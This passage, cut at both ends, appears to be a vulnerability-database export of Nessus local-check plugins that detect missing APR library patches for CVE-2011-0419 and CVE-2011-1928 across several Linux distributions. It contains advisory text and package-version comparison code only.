script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64apr-devel-1.3.9-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64apr1-1.3.9-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libapr-devel-1.3.9-1.2mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libapr1-1.3.9-1.2mdv2010.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:08", "description": "Move to 1.4.x branch.\n\nVarious bug fixes since 1.4.2.\n\nSecurity: CVE-2011-0419 Reimplement apr_fnmatch() from scratch using a non-recursive algorithm; now has improved compliance with the fnmatch() spec.\n\nNote: 1.4.3 was never officially released.\n\nFix CVE-2011-1928 introduced in 1.4.4.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "nessus", "title": "Fedora 14 : apr-1.4.5-1.fc14 (2011-6918)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:apr", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-6918.NASL", "href": "https://www.tenable.com/plugins/nessus/54957", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-6918.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54957);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_bugtraq_id(47820, 47929);\n script_xref(name:\"FEDORA\", value:\"2011-6918\");\n\n script_name(english:\"Fedora 14 : apr-1.4.5-1.fc14 (2011-6918)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Move to 1.4.x branch.\n\nVarious bug fixes since 1.4.2.\n\nSecurity: CVE-2011-0419 Reimplement apr_fnmatch() from scratch using a\nnon-recursive algorithm; now has improved compliance with the\nfnmatch() spec.\n\nNote: 1.4.3 was never officially released.\n\nFix CVE-2011-1928 introduced in 1.4.4.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=703390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=706203\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-June/061177.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?baa855b9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected apr package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"apr-1.4.5-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:41", "description": "Move to 1.4.x branch.\n\nVarious bug fixes since 1.4.2.\n\nSecurity: CVE-2011-0419 Reimplement apr_fnmatch() from scratch using a non-recursive algorithm; now has improved compliance with the fnmatch() spec.\n\nNote: 1.4.3 was never officially released.\n\nFix CVE-2011-1928 introduced in 1.4.4.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "nessus", "title": "Fedora 13 : apr-1.4.5-1.fc13 (2011-7340)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:apr", "cpe:/o:fedoraproject:fedora:13"], "id": "FEDORA_2011-7340.NASL", "href": "https://www.tenable.com/plugins/nessus/54958", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-7340.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54958);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_bugtraq_id(47820, 47929);\n script_xref(name:\"FEDORA\", value:\"2011-7340\");\n\n script_name(english:\"Fedora 13 : apr-1.4.5-1.fc13 (2011-7340)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Move to 1.4.x branch.\n\nVarious bug fixes since 1.4.2.\n\nSecurity: CVE-2011-0419 Reimplement apr_fnmatch() from scratch using a\nnon-recursive algorithm; now has improved compliance with the\nfnmatch() spec.\n\nNote: 1.4.3 was never officially released.\n\nFix CVE-2011-1928 introduced in 1.4.4.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=703390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=706203\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-June/061183.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2456b320\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected apr package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"apr-1.4.5-1.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:02", "description": "Updated apr packages that fix one security issue are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having low security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the Apache HTTP Server and other projects. It provides a free library of C data structures and routines.\n\nThe fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME matching flag was used. A remote attacker could possibly use this flaw to cause a denial of service on an application using the apr_fnmatch() function. (CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location' directive with wildcard URLs. The denial of service could have been triggered during normal operation; it did not specifically require a malicious HTTP request.\n\nThis update also addresses additional problems introduced by the rewrite of the apr_fnmatch() function, which was necessary to address the CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain a backported patch to correct this issue. Applications using the apr library, such as httpd, must be restarted for this update to take effect.", "cvss3": {}, "published": "2011-06-01T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 / 6 : apr (RHSA-2011:0844)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apr", "p-cpe:/a:redhat:enterprise_linux:apr-debuginfo", "p-cpe:/a:redhat:enterprise_linux:apr-devel", "p-cpe:/a:redhat:enterprise_linux:apr-docs", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:4.8", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.1"], "id": "REDHAT-RHSA-2011-0844.NASL", "href": "https://www.tenable.com/plugins/nessus/54932", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:0844. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54932);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_bugtraq_id(47929);\n script_xref(name:\"RHSA\", value:\"2011:0844\");\n\n script_name(english:\"RHEL 4 / 5 / 6 : apr (RHSA-2011:0844)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apr packages that fix one security issue are now available for\nRed Hat Enterprise Linux 4, 5, and 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C\ndata structures and routines.\n\nThe fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\ninfinite loop flaw in the apr_fnmatch() function when the\nAPR_FNM_PATHNAME matching flag was used. A remote attacker could\npossibly use this flaw to cause a denial of service on an application\nusing the apr_fnmatch() function. (CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location'\ndirective with wildcard URLs. The denial of service could have been\ntriggered during normal operation; it did not specifically require a\nmalicious HTTP request.\n\nThis update also addresses additional problems introduced by the\nrewrite of the apr_fnmatch() function, which was necessary to address\nthe CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain\na backported patch to correct this issue. Applications using the apr\nlibrary, such as httpd, must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1928\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://rhn.redhat.com/errata/RHSA-2011-0507.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:0844\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apr-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apr-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:0844\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"apr-0.9.4-26.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"apr-devel-0.9.4-26.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"apr-1.2.7-11.el5_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"apr-devel-1.2.7-11.el5_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"apr-docs-1.2.7-11.el5_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"apr-docs-1.2.7-11.el5_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"apr-docs-1.2.7-11.el5_6.5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"apr-1.3.9-3.el6_1.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apr-debuginfo-1.3.9-3.el6_1.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apr-devel-1.3.9-3.el6_1.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apr / apr-debuginfo / apr-devel / apr-docs\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:41", "description": "This update fixes the following security issue :\n\n - 693778: unconstrained recursion when processing patterns. (CVE-2011-0419 / CVE-2011-1928)", "cvss3": {}, "published": "2011-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : libapr1 (ZYPP Patch Number 7610)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_LIBAPR1-7610.NASL", "href": "https://www.tenable.com/plugins/nessus/57215", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57215);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n\n script_name(english:\"SuSE 10 Security Update : libapr1 (ZYPP Patch Number 7610)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issue :\n\n - 693778: unconstrained recursion when processing\n patterns. (CVE-2011-0419 / CVE-2011-1928)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-0419.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1928.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7610.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"libapr1-1.2.2-13.10.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"libapr1-devel-1.2.2-13.10.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"libapr1-1.2.2-13.10.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"libapr1-devel-1.2.2-13.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:09", "description": "The Apache Portable Runtime (APR) is a portability library used by the Apache HTTP Server and other projects. It provides a free library of C data structures and routines.\n\nThe fix for CVE-2011-0419 introduced an infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME matching flag was used. A remote attacker could possibly use this flaw to cause a denial of service on an application using the apr_fnmatch() function.\n(CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location' directive with wildcard URLs. The denial of service could have been triggered during normal operation; it did not specifically require a malicious HTTP request.\n\nThis update also addresses additional problems introduced by the rewrite of the apr_fnmatch() function, which was necessary to address the CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain a backported patch to correct this issue. Applications using the apr library, such as httpd, must be restarted for this update to take effect.", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : apr on SL6.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20110531_APR_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61053", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61053);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n\n script_name(english:\"Scientific Linux Security Update : apr on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C\ndata structures and routines.\n\nThe fix for CVE-2011-0419 introduced an infinite loop flaw in the\napr_fnmatch() function when the APR_FNM_PATHNAME matching flag was\nused. A remote attacker could possibly use this flaw to cause a denial\nof service on an application using the apr_fnmatch() function.\n(CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the 'Location'\ndirective with wildcard URLs. The denial of service could have been\ntriggered during normal operation; it did not specifically require a\nmalicious HTTP request.\n\nThis update also addresses additional problems introduced by the\nrewrite of the apr_fnmatch() function, which was necessary to address\nthe CVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain\na backported patch to correct this issue. Applications using the apr\nlibrary, such as httpd, must be restarted for this update to take\neffect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1106&L=scientific-linux-errata&T=0&P=2130\n script_set_attribute(\n attribute:\"see_also\",\n 